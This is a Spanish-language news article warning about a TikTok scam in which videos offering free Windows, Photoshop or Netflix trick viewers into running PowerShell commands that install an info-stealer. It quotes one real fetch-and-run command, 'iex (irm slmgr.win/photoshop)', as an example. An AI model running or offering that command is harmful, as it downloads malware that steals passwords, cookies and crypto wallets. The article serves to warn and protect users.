Alertan por una nueva modalidad de estafa virtual en la red social TikTok. Una peligrosa campaña de estafas digitales volvió a ser tendencia en TikTok y ya preocupa a los expertos en ciberseguridad. Se trata de videos que prometen trucos para conseguir software pago gratis, como Windows, Photoshop o Netflix, pero en realidad es un truco para difundir malware capaz de robar contraseñas y controlar tu dispositivo.
Te roban las contraseñas. Con una nueva modalidad de estafa virtual en TikTok te roban las contraseñas.
Los videos, que acumulan miles de visualizaciones, se presentan como tutoriales educativos que muestran cómo activar o desbloquear programas sin pagar.
Sin embargo, detrás de esas supuestas guías técnicas se esconde el engaño que ya hace estragos en los usuarios que caen en la trampa.
Los ciberdelincuentes aprovechan la confianza y el formato rápido de TikTok para difundir instrucciones que parecen inofensivas. En los videos, los creadores muestran paso a paso cómo activar software o acceder a servicios premium, mientras piden al usuario que copie y ejecute ciertos comandos en su computadora.
Esta táctica, conocida como ClickFix, consiste en métodos de ingeniería social diseñados para manipular a los usuarios y hacer que ejecuten código malicioso por su propia cuenta.
Uno de esos comandos, por ejemplo, es [iex (irm slmgr.win/photoshop)], una línea que se ejecuta en PowerShell, la consola de comandos de Windows. Al hacerlo, el sistema se conecta con servidores remotos desde donde se descargan scripts y programas ocultos.
Dos de esos ejecutables son especialmente peligrosos: uno de ellos es una variante del ladrón de información Aura Stealer, diseñado para extraer contraseñas, cookies de sesión y hasta accesos a billeteras de criptomonedas.
Además, el malware no solo roba datos personales, sino que también puede otorgar a los atacantes acceso al sistema o dispositivo comprometido. Esto les permite manipular archivos, instalar nuevos programas o usar el dispositivo para otras actividades delictivas sin que el usuario lo note.
TikTok: cómo evitar ser estafado
Este tipo de campañas se sostiene gracias a la curiosidad y el desconocimiento técnico de muchos usuarios que, por un lado, buscan evitar pagar por licencias y, por el otro, no saben los peligros de instalar aplicaciones no oficiales o programas crackeados.
Lo cierto es que no existen métodos legítimos para obtener software de pago de forma gratuita. Y ejecutar comandos o descargar archivos desde fuentes no verificadas puede tener consecuencias graves, como la pérdida total de datos y la exposición de información personal o financiera.
En estos casos, recomendación es clara: desconfiar de cualquier tutorial que prometa activar programas sin licencia y nunca ejecutar comandos desconocidos en tu computadora.
Y si ya lo hiciste e intentaste seguir las instrucciones de estos videos, lo ideal es cambiar todas las contraseñas y realizar un análisis completo del sistema con un antivirus actualizado.
Fuente: tn.com.ar
Temas relacionados:
las más leídas
Lo que se lee ahora